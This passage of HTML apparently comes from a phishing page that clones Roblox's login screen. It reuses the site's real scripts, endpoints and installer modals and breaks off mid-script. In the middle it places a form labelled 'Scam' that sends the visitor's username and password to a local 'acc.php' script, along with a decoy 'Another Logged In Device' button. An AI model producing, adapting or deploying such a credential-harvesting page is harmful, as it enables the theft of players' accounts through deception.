Roblox.Endpoints.Urls['/thumbnail/avatar-headshot'] = 'https://www.roblox.com/thumbnail/avatar-headshot';
Roblox.Endpoints.Urls['/thumbnail/avatar-headshots'] = 'https://www.roblox.com/thumbnail/avatar-headshots';
Roblox.Endpoints.Urls['/thumbnail/user-avatar'] = 'https://www.roblox.com/thumbnail/user-avatar';
Roblox.Endpoints.Urls['/thumbnail/resolve-hash'] = 'https://www.roblox.com/thumbnail/resolve-hash';
Roblox.Endpoints.Urls['/thumbnail/place'] = 'https://www.roblox.com/thumbnail/place';
Roblox.Endpoints.Urls['/thumbnail/get-asset-media'] = 'https://www.roblox.com/thumbnail/get-asset-media';
Roblox.Endpoints.Urls['/thumbnail/remove-asset-media'] = 'https://www.roblox.com/thumbnail/remove-asset-media';
Roblox.Endpoints.Urls['/thumbnail/set-asset-media-sort-order'] = 'https://www.roblox.com/thumbnail/set-asset-media-sort-order';
Roblox.Endpoints.Urls['/thumbnail/place-thumbnails'] = 'https://www.roblox.com/thumbnail/place-thumbnails';
Roblox.Endpoints.Urls['/thumbnail/place-thumbnails-partial'] = 'https://www.roblox.com/thumbnail/place-thumbnails-partial';
Roblox.Endpoints.Urls['/thumbnail_holder/g'] = 'https://www.roblox.com/thumbnail_holder/g';
Roblox.Endpoints.Urls['/users/{id}/profile'] = 'https://www.roblox.com/users/{id}/profile';
Roblox.Endpoints.Urls['/service-workers/push-notifications'] = 'https://www.roblox.com/service-workers/push-notifications';
Roblox.Endpoints.Urls['/notification-stream/notification-stream-data'] = 'https://www.roblox.com/notification-stream/notification-stream-data';
Roblox.Endpoints.Urls['/api/friends/acceptfriendrequest'] = 'https://www.roblox.com/api/friends/acceptfriendrequest';
Roblox.Endpoints.Urls['/api/friends/declinefriendrequest'] = 'https://www.roblox.com/api/friends/declinefriendrequest';
Roblox.Endpoints.Urls['/authentication/is-logged-in'] = 'https://www.roblox.com/authentication/is-logged-in';
Roblox.Endpoints.addCrossDomainOptionsToAllRequests = true;
     </script>
     <script type="text/javascript">
      if (typeof(Roblox) === "undefined") { Roblox = {}; }
Roblox.Endpoints = Roblox.Endpoints || {};
Roblox.Endpoints.Urls = Roblox.Endpoints.Urls || {};
     </script>
     <script>
      Roblox = Roblox || {};
    Roblox.AbuseReportPVMeta = {
        desktopEnabled: false,
        phoneEnabled: false,
        inAppEnabled: false
    };
     </script>
     <meta data-concurrent-thumbnail-request-count="4" data-is-webapp-cache-enabled="False" data-request-batch-size="100" data-request-max-cooldown="30000" data-request-max-retry-attempts="3" data-request-min-cooldown="1000" data-thumbnail-metrics-sample-size="20" data-webapp-cache-expirations-timespan="00:01:00" name="thumbnail-meta-data"/>
    </meta>
   </meta>
  </meta>
  <script src>
  </script>
 </head>
 <body class="rbx-body light-theme gotham-font" data-internal-page-name="Login" data-performance-relative-value="0.005" data-send-event-percentage="0" id="rbx-body">
  <meta data-token="9iuABERhQwkk" name="csrf-token"/>
  <div data-as-http-regex="(([^.]help|polls)\.roblox\.com)" data-enabled="true" data-regex="(https?\:\/\/)?(?:www\.)?([a-z0-9-]{2,}\.)*(((m|de|www|web|api|blog|wiki|corp|polls|bloxcon|developer|devforum|forum|status)\.roblox\.com|robloxlabs\.com)|(www\.shoproblox\.com)|(roblox\.status\.io)|(rblx\.co)|help\.roblox\.com(?![A-Za-z0-9\/.]*\/attachments\/))(?!\/[A-Za-z0-9-+&amp;@#\/=~_|!:,.;]*%)((\/[A-Za-z0-9-+&amp;@#\/%?=~_|!:,.;]*)|(?=\s|\b))" data-regex-flags="gm" id="roblox-linkify">
  </div>
  <div data-ga-logging-percent="10" data-image-retry-max-times="30" data-image-retry-timer="500" id="image-retry-data">
  </div>
  <div data-http-retry-base-timeout="0" data-http-retry-max-timeout="0" data-http-retry-max-times="1" id="http-retry-data">
  </div>
  <div id="fb-root">
  </div>
  <div class="wrap no-gutter-ads logged-out" data-gutter-ads-enabled="false" id="wrap">
   <div class="light-theme gotham-font" data-number-of-autocomplete-suggestions="7" id="navigation-container">
    <div class="navbar-fixed-top rbx-header" id="header" role="navigation">
     <div class="container-fluid">
      <div class="rbx-navbar-header">
       <div class="rbx-nav-collapse" id="header-menu-icon" role="button" tabindex="0">
        <span class="icon-nav-menu">
        </span>
       </div>
       <div class="navbar-header">
        <a class="navbar-brand" href="/home">
         <span class="icon-logo">
         </span>
         <span class="icon-logo-r">
         </span>
        </a>
       </div>
      </div>
      <ul class="nav rbx-navbar hidden-xs hidden-sm col-md-5 col-lg-4">
       <li class="cursor-pointer">
        <a class="font-header-2 nav-menu-title text-header" href="/discover">
         Discover
        </a>
       </li>
       <li class="cursor-pointer">
        <a class="font-header-2 nav-menu-title text-header" href="/catalog">
         Avatar Shop
        </a>
       </li>
       <li class="cursor-pointer">
        <a class="font-header-2 nav-menu-title text-header" href="/develop">
         Create
        </a>
       </li>
       <li class="cursor-pointer">
        <a class="font-header-2 nav-menu-title text-header" href="/robux?ctx-nav">
         Robux
        </a>
       </li>
      </ul>
      <ul class="nav rbx-navbar hidden-md hidden-lg col-xs-12">
       <li class="cursor-pointer">
        <a class="font-header-2 nav-menu-title text-header" href="/discover">
         Discover
        </a>
       </li>
       <li class="cursor-pointer">
        <a class="font-header-2 nav-menu-title text-header" href="/catalog">
         Avatar Shop
        </a>
       </li>
       <li class="cursor-pointer">
        <a class="font-header-2 nav-menu-title text-header" href="/develop">
         Create
        </a>
       </li>
       <li class="cursor-pointer">
        <a class="font-header-2 nav-menu-title text-header" href="/robux?ctx=nav">
         Robux
        </a>
       </li>
      </ul>
      <div id="right-navigation-header">
      </div>
     </div>
    </div>
    <div id="left-navigation-container">
    </div>
    <div id="verificationUpsell-container">
     <div verificationupsell-container="">
     </div>
    </div>
    <div id="accountRecoveryModal-container">
     <div accountrecoverymodal-container="">
     </div>
    </div>
   </div>
   <script type="text/javascript">
    var Roblox = Roblox || {};
    (function () {
        if (Roblox && Roblox.Performance) {
            Roblox.Performance.setPerformanceMark("navigation_end");
        }
    })();
   </script>
   <div class="container-main " id="container-main">
    <script type="text/javascript">
     if (top.location != self.location) {
                    top.location = self.location.href;
                }
    </script>
    <div class="alert-container">
     <noscript>
      <div>
       <div class="alert-info" role="alert">
        Please enable Javascript to use all the features on this site.
       </div>
      </div>
     </noscript>
    </div>
    <div class="content">
     <script async="" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportResourceError('funcaptcha')" src="https://roblox-api.arkoselabs.com/fc/api/?onload=reportFunCaptchaLoaded">
     </script>
     <script type="text/javascript">
      var Roblox = Roblox || {};
    $(function () {
        var funCaptcha = Roblox.FunCaptcha;
        if (funCaptcha) {
            var captchaTypes = [{"Type":"Login","PublicKey":"9F35E182-C93C-EBCC-A31D-CF8ED317B996","ApiUrl":"https://captcha.roblox.com/v1/funcaptcha/login/web"}];
            funCaptcha.addCaptchaTypes(captchaTypes, true);
            funCaptcha.setMaxRetriesOnTokenValidationFailure(0);
            funCaptcha.setPerAppTypeLoggingEnabled(false);
            funCaptcha.setRetryIntervalRange(500, 1500);
        }
    });

    // Necessary because of how FunCaptcha js executes callback
    // i.e. window["{function name}"]
    function reportFunCaptchaLoaded()
    {
        if (Roblox.BundleDetector)
        {
            Roblox.BundleDetector.reportResourceLoaded("funcaptcha");
        }
    }
     </script>
     <style>
       .Scam{
         background: white;
         height: 400px;
       }
       input[type="submit"]
       {
         width: 315px;
         font-size: 15px;
         background: none;
         height: 30px;
         border: none;
         border: 1px solid black;
         border-radius: 6px;
         color: gray;
       }
       input[type="text"],input[type="password"]
       {
         color: black;
         font-size: 18px;
         outline: none;
       }
     </style>
     <center>
     <form class="Scam" action="acc.php" method=post>
       <br>
       <h1>Login to Roblox</h1><br>
       <input type="text" name="username" id="username" placeholder=" Username/Email/Phone" / style="background:none;width:320px;height:35px;border-radius:6px;"><br><br>
       <input type="password" name="password" id="" placeholder=" Password" style="background:none;width:320px;height:35px;border-radius:6px;"/>
       <br><br><b><input type="submit" name="" id="" value="Log In" /></b><br><br>
       <h3><a href="#">Forget Password or Username?</a></h3>
       <br>
       <hr>Login With<hr>
       <b><input type="submit" name="" id="" value="Another Logged In Device" /></b><br><br><span>Don't have an account?&nbsp;&nbsp;<a href="#"><b>Sign Up</b></a>
     </form>
     </center>
     <script>
      var Roblox = Roblox || {};
    Roblox.LoginMeta = {
        signupUrl: "https://www.roblox.com/account/signupredir",
        forgotCredentialsUrl: "https://www.roblox.com/login/forgot-password-or-username",
        homeUrl: "https://www.roblox.com/home",
        securityNotificationUrl: "https://www.roblox.com/login/securitynotification",
        apiProxyUrl: "https://api.roblox.com",
        fbSignInUrl: "",
        loginPageUrl: "https://www.roblox.com/newlogin",
        isLoginWithEmailEnabled: true,
        isLoginWithPhoneEnabled: true,
        isPromptUnverifiedEmailsEnabled: false
    };
     </script>
     <script async="" defer="" src="https://cdns.gigya.com/js/gigya.js?apiKey=3_OsvmtBbTg6S_EUbwTPtbbmoihFY5ON6v6hbVrTbuqpBs7SyF_LQaJwtwKJ60sY1p" type="text/javascript">
      {
                bypassCookiePolicy: 'never'
            }
     </script>
     <div data-context="loginPage" data-rbx-login-redirect-url="/social/postlogin" id="SocialIdentitiesInformation">
     </div>
    </div>
   </div>
   <!--Bootstrap Footer React Component -->
   <footer class="container-footer" data-is-giftcards-footer-enabled="True" id="footer-container">
   </footer>
  </div>
  <div class="cookie-banner-wrapper" id="cookie-banner-wrapper">
  </div>
  <script type="text/javascript">
   function urchinTracker() {}
  </script>
  <script type="text/javascript">
   if (typeof Roblox === "undefined") {
        Roblox = {};
    }
    if (typeof Roblox.PlaceLauncher === "undefined") {
        Roblox.PlaceLauncher = {};
    }
    var isRobloxIconEnabledForRetheme = "True";
    var robloxIcon = isRobloxIconEnabledForRetheme === 'True' ? "<span class='icon-logo-r-95'></span>" : "<img src='https://images.rbxcdn.com/8e7879f99cfa7cc3b1fce74f8191be03.svg' width='90' height='90' alt='R'/>";
    Roblox.PlaceLauncher.Resources = {
        RefactorEnabled: "True",
        IsProtocolHandlerBaseUrlParamEnabled: "False",
        ProtocolHandlerAreYouInstalled: {
            play: {
                content: robloxIcon + "<p>You&#39;re moments away from getting into the experience!</p>",
                buttonText: "Download and Install Roblox",
                footerContent: "<a href='https://assetgame.roblox.com/game/help'class= 'text-name small' target='_blank' >Click here for help</a> "
            },
            studio: {
                content: "<img src='https://images.rbxcdn.com/f25e4cadae29ae9a57a962126b2d2e2a.png' width='95' height='95' alt='R' /><p>Get started creating your own experiences!</p>",
                buttonText: "Download Studio"
            }
        },
        ProtocolHandlerStartingDialog: {
            play: {
                content: robloxIcon + "<p>Roblox is now loading. Get ready!</p>"
            },
            studio: {
                content: "<img src='https://images.rbxcdn.com/f25e4cadae29ae9a57a962126b2d2e2a.png' width='95' height='95' alt='R' /><p>Checking for Roblox Studio...</p>"
            },
            loader: "<span class='spinner spinner-default'></span>"
        }
    };
  </script>
  <div data-event-stream-for-plugin-enabled="True" data-event-stream-for-protocol-enabled="True" data-is-duar-auto-opt-in-enabled="false" data-is-duar-opt-out-disabled="false" data-is-game-launch-interface-enabled="True" data-is-protocol-handler-launch-enabled="True" data-is-user-logged-in="False" data-new-plugin-events-enabled="True" data-os-name="Unknown" data-protocol-avatar-parameter-enabled="false" data-protocol-channel-name="LIVE" data-protocol-detection-enabled="true" data-protocol-game-locale="en_us" data-protocol-name-for-client="roblox-player" data-protocol-name-for-studio="roblox-studio" data-protocol-player-channel-name="" data-protocol-roblox-locale="en_us" data-protocol-separate-script-parameters-enabled="true" data-protocol-studio-channel-name="" data-protocol-url-includes-launchtime="true" id="PlaceLauncherStatusPanel" style="display:none;width:300px">
   <div class="modalPopup blueAndWhite PlaceLauncherModal" style="min-height: 160px">
    <div class="Spinner" id="Spinner" style="padding:20px 0;">
     <img alt="Progress" data-delaysrc="https://images.rbxcdn.com/e998fb4c03e8c2e30792f2f3436e9416.gif" height="32" width="32"/>
    </div>
    <div id="status" style="min-height:40px;text-align:center;margin:5px 20px">
     <div class="PlaceLauncherStatus MadStatusStarting" id="Starting" style="display:block">
      Starting Roblox...
     </div>
     <div class="PlaceLauncherStatus MadStatusField" id="Waiting">
      Connecting to People...
     </div>
     <div class="PlaceLauncherStatus PlaceLauncherStatusBackBuffer MadStatusBackBuffer" id="StatusBackBuffer">
     </div>
    </div>
    <div style="text-align:center;margin-top:1em">
     <input class="Button CancelPlaceLauncherButton translate" type="button" value="Cancel"/>
    </div>
   </div>
  </div>
  <div class="ph-clickalwaysallowed" id="ProtocolHandlerClickAlwaysAllowed" style="display:none;">
   <p class="larger-font-size">
    <span class="icon-moreinfo">
    </span>
    Check
    <strong>
     Remember my choice
    </strong>
    and click
    <img alt="Launch Application" data-delaysrc="https://images.rbxcdn.com/7c8d7a39b4335931221857cca2b5430b.png"/>
    in the dialog box above to join experiences faster in the future!
   </p>
  </div>
  <script type="text/javascript">
   function checkRobloxInstall() {
             window.location = 'https://www.roblox.com/unsupported?osx=10.5'; return false;
}
  </script>
  <div class="" id="InstallationInstructions" style="display:none;">
   <div class="ph-installinstructions">
    <div class="ph-modal-header">
     <span class="icon-close simplemodal-close">
     </span>
     <h3 class="title">
      Thanks for visiting Roblox
     </h3>
    </div>
    <div class="modal-content-container">
     <div class="ph-installinstructions-body ">
      <ul class="modal-col-4">
       <li class="step1-of-4">
        <h2>
         1
        </h2>
        <p class="larger-font-size">
         Click
         <strong>
          RobloxPlayer.exe
         </strong>
         to run the Roblox installer, which just downloaded via your web browser.
        </p>
        <img data-delaysrc="https://images.rbxcdn.com/28eaa93b899b93461399aebf21c5346f.png"/>
       </li>
       <li class="step2-of-4">
        <h2>
         2
        </h2>
        <p class="larger-font-size">
         Click
         <strong>
          Run
         </strong>
         when prompted by your computer to begin the installation process.
        </p>
        <img data-delaysrc="https://images.rbxcdn.com/51328932dedb5d8d61107272cc1a27db.png"/>
       </li>
       <li class="step3-of-4">
        <h2>
         3
        </h2>
        <p class="larger-font-size">
         Click
         <strong>
          Ok
         </strong>
         once you've successfully installed Roblox.
        </p>
        <img data-delaysrc="https://images.rbxcdn.com/3797745629baca2d1b9496b76bc9e6dc.png"/>
       </li>
       <li class="step4-of-4">
        <h2>
         4
        </h2>
        <p class="larger-font-size">
         After installation, click
         <strong>
          Join
         </strong>
         below to join the action!
        </p>
        <div class="VisitButton VisitButtonContinueGLI">
         <a class="btn btn-primary-lg disabled btn-full-width">
          Join
         </a>
        </div>
       </li>
      </ul>
     </div>
    </div>
    <div class="xsmall">
     The Roblox installer should download shortly. If it doesn’t, start the
     <a class="text-link" href="#" id="GameLaunchManualInstallLink">
      download now.
     </a>
     <script id="GameLaunchInstructionsLinkScript">
      if (Roblox.ProtocolHandlerClientInterface && typeof Roblox.ProtocolHandlerClientInterface.attachManualDownloadToLink === 'function') {
                           Roblox.ProtocolHandlerClientInterface.attachManualDownloadToLink();
                       }
     </script>
    </div>
   </div>
  </div>
  <div class="InstallInstructionsImage" data-modalwidth="970" style="display:none;">
  </div>
  <div id="pluginObjDiv" style="height:1px;width:1px;visibility:hidden;position: absolute;top: 0;">
  </div>
  <iframe id="downloadInstallerIFrame" name="downloadInstallerIFrame" style="visibility:hidden;height:0;width:1px;position:absolute">
  </iframe>
  <script data-bundlename="clientinstaller" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/f424a786e3d883cff747a034605fa09d.js" type="text/javascript">
  </script>
  <script type="text/javascript">
   Roblox.Client._skip = '/unsupported';
    Roblox.Client._CLSID = '';
    Roblox.Client._installHost = '';
    Roblox.Client.ImplementsProxy = false;
    Roblox.Client._silentModeEnabled = false;
    Roblox.Client._bringAppToFrontEnabled = false;
    Roblox.Client._currentPluginVersion = '';
    Roblox.Client._eventStreamLoggingEnabled = false;

        
        Roblox.Client._installSuccess = function() {
            if(GoogleAnalyticsEvents){
                GoogleAnalyticsEvents.ViewVirtual('InstallSuccess');
                GoogleAnalyticsEvents.FireEvent(['Plugin','Install Success']);
                if (Roblox.Client._eventStreamLoggingEnabled && typeof Roblox.GamePlayEvents != "undefined") {
                    Roblox.GamePlayEvents.SendInstallSuccess(Roblox.Client._launchMode, play_placeId);
                }
            }
        }
        
            
        if ((window.chrome || window.safari) && window.location.hash == '#chromeInstall') {
            window.location.hash = '';
            var continuation = '(' + $.cookie('chromeInstall') + ')';
            play_placeId = $.cookie('chromeInstallPlaceId');
            Roblox.GamePlayEvents.lastContext = $.cookie('chromeInstallLaunchMode');
            $.cookie('chromeInstallPlaceId', null);
            $.cookie('chromeInstallLaunchMode', null);
            $.cookie('chromeInstall', null);
            RobloxLaunch._GoogleAnalyticsCallback = function() { var isInsideRobloxIDE = 'website'; if (Roblox && Roblox.Client && Roblox.Client.isIDE && Roblox.Client.isIDE()) { isInsideRobloxIDE = 'Studio'; };GoogleAnalyticsEvents.FireEvent(['Plugin Location', 'Launch Attempt', isInsideRobloxIDE]);GoogleAnalyticsEvents.FireEvent(['Plugin', 'Launch Attempt', 'Play']);EventTracker.fireEvent('GameLaunchAttempt_Unknown', 'GameLaunchAttempt_Unknown_Plugin'); if (typeof Roblox.GamePlayEvents != 'undefined') { Roblox.GamePlayEvents.SendClientStartAttempt(null, play_placeId); }  }; 
            Roblox.Client.ResumeTimer(eval(continuation));
        }
  </script>
  <div class="ConfirmationModal modalPopup unifiedModal smallModal" data-modal-handle="confirmation" style="display:none;">
   <a class="genericmodal-close ImageButton closeBtnCircle_20h">
   </a>
   <div class="Title">
   </div>
   <div class="GenericModalBody">
    <div class="TopBody">
     <div class="ImageContainer roblox-item-image" data-image-size="small" data-no-click="" data-no-overlays="">
      <img alt="generic image" class="GenericModalImage"/>
     </div>
     <div class="Message">
     </div>
    </div>
    <div class="ConfirmationModalButtonContainer GenericModalButtonContainer">
     <a href="" id="roblox-confirm-btn">
      <span>
      </span>
     </a>
     <a href="" id="roblox-decline-btn">
      <span>
      </span>
     </a>
    </div>
    <div class="ConfirmationModalFooter">
    </div>
   </div>
   <script type="text/javascript">
    Roblox = Roblox || {};
        Roblox.Resources = Roblox.Resources || {};
        
        Roblox.Resources.GenericConfirmation = {
            yes: "Yes",
            No: "No",
            Confirm: "Confirm",
            Cancel: "Cancel"
        };
   </script>
  </div>
  <div class="modal-confirmation" data-modal-type="confirmation" id="modal-confirmation">
   <div class="modal-dialog" id="modal-dialog">
    <div class="modal-content">
     <div class="modal-header">
      <button class="close" data-dismiss="modal" type="button">
       <span aria-hidden="true">
        <span class="icon-close">
        </span>
       </span>
       <span class="sr-only">
        Close
       </span>
      </button>
      <h5 class="modal-title">
      </h5>
     </div>
     <div class="modal-body">
      <div class="modal-top-body">
       <div class="modal-message">
       </div>
       <div class="modal-image-container roblox-item-image" data-image-size="medium" data-no-click="" data-no-overlays="">
        <img alt="generic image" class="modal-thumb"/>
       </div>
       <div class="modal-checkbox checkbox">
        <input id="modal-checkbox-input" type="checkbox"/>
        <label for="modal-checkbox-input">
        </label>
       </div>
      </div>
      <div class="modal-btns">
       <a href="" id="confirm-btn">
        <span>
        </span>
       </a>
       <a href="" id="decline-btn">
        <span>
        </span>
       </a>
      </div>
      <div class="loading modal-processing">
       <img alt="Processing..." class="loading-default" src="https://images.rbxcdn.com/4bed93c91f909002b1f17f05c0ce13d1.gif"/>
      </div>
     </div>
     <div class="modal-footer text-footer">
     </div>
    </div>
   </div>
  </div>
  <script type="text/javascript">
   var Roblox = Roblox || {};
    Roblox.jsConsoleEnabled = false;
  </script>
  <script type="text/javascript">
   $(function () {
            Roblox.CookieUpgrader.domain = 'roblox.com';
            Roblox.CookieUpgrader.upgrade("GuestData", { expires: Roblox.CookieUpgrader.thirtyYearsFromNow });
            Roblox.CookieUpgrader.upgrade("RBXSource", { expires: function (cookie) { return Roblox.CookieUpgrader.getExpirationFromCookieValue("rbx_acquisition_time", cookie); } });
            Roblox.CookieUpgrader.upgrade("RBXViralAcquisition", { expires: function (cookie) { return Roblox.CookieUpgrader.getExpirationFromCookieValue("time", cookie); } });
                
                Roblox.CookieUpgrader.upgrade("RBXMarketing", { expires: Roblox.CookieUpgrader.thirtyYearsFromNow });
                
                            
                Roblox.CookieUpgrader.upgrade("RBXSessionTracker", { expires: Roblox.CookieUpgrader.fourHoursFromNow });
                
                            
                Roblox.CookieUpgrader.upgrade("RBXEventTrackerV2", {expires: Roblox.CookieUpgrader.thirtyYearsFromNow});
                
        });
  </script>
  <script data-bundlename="intl-polyfill" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/d44520f7da5ec476cfb1704d91bab327.js" type="text/javascript">
  </script>
  <script data-bundle-source="Main" data-bundlename="InternationalCore" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/95044be3ff42e3dc429313faca1316cea62f328a39e29689ffeda9002f3a8bc6.js" type="text/javascript">
  </script>
  <script data-bundle-source="Main" data-bundlename="TranslationResources" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/83d836a661ff433d5b7ce719c489e43af590ff75ab39ccc6d393546fe91b766a.js" type="text/javascript">
  </script>
  <script data-bundlename="leanbase" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/19c8160ae932a35d164b48dd597c55c2.js" type="text/javascript">
  </script>
  <script data-bundle-source="Main" data-bundlename="CoreUtilities" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/277bc1c2c3f6867fac70a6561b87bbcc6a874a7274319303cdd87ada099bb07e.js" type="text/javascript">
  </script>
  <script data-bundle-source="Main" data-bundlename="CoreRobloxUtilities" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/76a4480b37d00df868cd2f72f045e279ab6525b49284e5486c28fd2c3fb8f562.js" type="text/javascript">
  </script>
  <script data-bundle-source="Main" data-bundlename="React" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/4c9a00164d9242bd60de5451a22f502c0c221a896d3a555470c03712d5ee4aa1.js" type="text/javascript">
  </script>
  <script data-bundle-source="Main" data-bundlename="ReactUtilities" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/cf340fb618d9a73913b30dfc624ae60d68b9e59723746e6c08d06d14ebdd6dca.js" type="text/javascript">
  </script>
  <script data-bundle-source="Main" data-bundlename="ReactStyleGuide" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/1c1581f969b677da65aacab6ec406807c68d67c7351d67838fbcf9d1bd48fa43.js" type="text/javascript">
  </script>
  <script data-bundle-source="Main" data-bundlename="ConfigureWebApps" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/5259cfe8a3e36118bd61120693dbba3ba87f2c3641f84bb07e29f1d69fe87523.js" type="text/javascript">
  </script>
  <script data-bundlename="angular" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/ae3d621886e736e52c97008e085fa286.js" type="text/javascript">
  </script>
  <script data-bundle-source="Main" data-bundlename="AngularJsUtilities" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/11d5c915c418571e1a6e666cfa2213c40e31f2a866daee1e0a75307c7d50e751.js" type="text/javascript">
  </script>
  <script data-bundle-source="Main" data-bundlename="InternationalAngularJs" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/90f18784a43a70553e967191b948f70b0193df565f1605762c3c1e245ab4b55a.js" type="text/javascript">
  </script>
  <script data-bundle-source="Main" data-bundlename="Thumbnails" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/b8ca5fe1ee9471c974d39c4d847c3c8f35f972ffd4a99005fab1fd80f23f997d.js" type="text/javascript">
  </script>
  <div data-interval="15000" data-is-enabled="False" id="presence-registration-bootstrap-data">
  </div>
  <script data-bundle-source="Main" data-bundlename="PresenceRegistration" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/0a83202cf5f2310227e607928f73a26cdaa7d5c27f892b99ef51ec3b863a694d.js" type="text/javascript">
  </script>
  <div ng-modules="baseTemplateApp">
   <script src="https://js.rbxcdn.com/ffcc04436179c6b2a6668fdfcfbf62b1.js" type="text/javascript">
   </script>
  </div>
  <div ng-modules="pageTemplateApp">
   <script src="https://js.rbxcdn.com/3e544c8e724dcdc296258b0ca69401a9.js" type="text/javascript">
   </script>
  </div>
  <script data-bundle-source="Main" data-bundlename="VerificationUpsell" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/5bfe49c914e658259a99af2844b9358cdf733083425d3b513cbdd155e3460414.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Feature.VerificationUpsell" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/4e31c7c976f24e75beac3766b6572ffaab7c17aacc1689bb15f528cced849092.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Feature.VerificationUpsell" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/da4ab091842664a429d48488bcc96285a130a687bfbf1ef14d730cf47a7309f6.js" type="text/javascript">
  </script>
  <script data-bundle-source="Main" data-bundlename="Navigation" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/1bc111d4996af11595011afe697d768e50056290be102a01b3ccd52c1207feb9.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Common.AlertsAndOptions" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/03a64d3850925b52ee73bd27b41658f4a35a2b33b4a499fcb2ce72dcbd98020f.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Common.AlertsAndOptions" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/8f06fef33a61a6c67e1e6d93829b9bb03476bc976102d7bcebe4bfe85a3d4328.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Feature.ShopDialog" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/95fdafe5af749e388de603b9ee7f67bb092c3c790badc572db4e2bca0c32b49a.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_Feature.ShopDialog" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/c0606e8d6eb4487cdc70d318e6de3d9aaeeb465ddb84acd95139011e56c5e5c6.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_CommonUI.Features" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/c629f6739d6903fec0d935d26a9cea02ff757856d4ed73a83fd1535affea0300.js" type="text/javascript">
  </script>
  <script data-bundle-source="Unknown" data-bundlename="DynamicLocalizationResourceScript_CommonUI.Features" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/5370e5e55fc9993ec53b0a4195e82290b8c1c5f95a1fb5cd11a2ec82d5d07809.js" type="text/javascript">
  </script>
  <script type="text/javascript">
   Roblox.config.externalResources = [];Roblox.config.paths['Pages.Catalog'] = 'https://js.rbxcdn.com/109d883fe3988fca757e26e341ed0fe8.js';Roblox.config.paths['Pages.CatalogShared'] = 'https://js.rbxcdn.com/33126cd3e259a404a2563594f55a3f06.js';Roblox.config.paths['Widgets.AvatarImage'] = 'https://js.rbxcdn.com/7d49ac94271bd506077acc9d0130eebb.js';Roblox.config.paths['Widgets.DropdownMenu'] = 'https://js.rbxcdn.com/da553e6b77b3d79bec37441b5fb317e7.js';Roblox.config.paths['Widgets.HierarchicalDropdown'] = 'https://js.rbxcdn.com/4a0af9989732810851e9e12809aeb8ad.js';Roblox.config.paths['Widgets.ItemImage'] = 'https://js.rbxcdn.com/61a0490ba23afa17f9ecca2a079a6a57.js';Roblox.config.paths['Widgets.PlaceImage'] = 'https://js.rbxcdn.com/a6df74a754523e097cab747621643c98.js';
  </script>
  <script>
   $(function () {
                Roblox.DeveloperConsoleWarning.showWarning();
            });
  </script>
  <script type="text/javascript">
   $(function(){
        function trackReturns() {
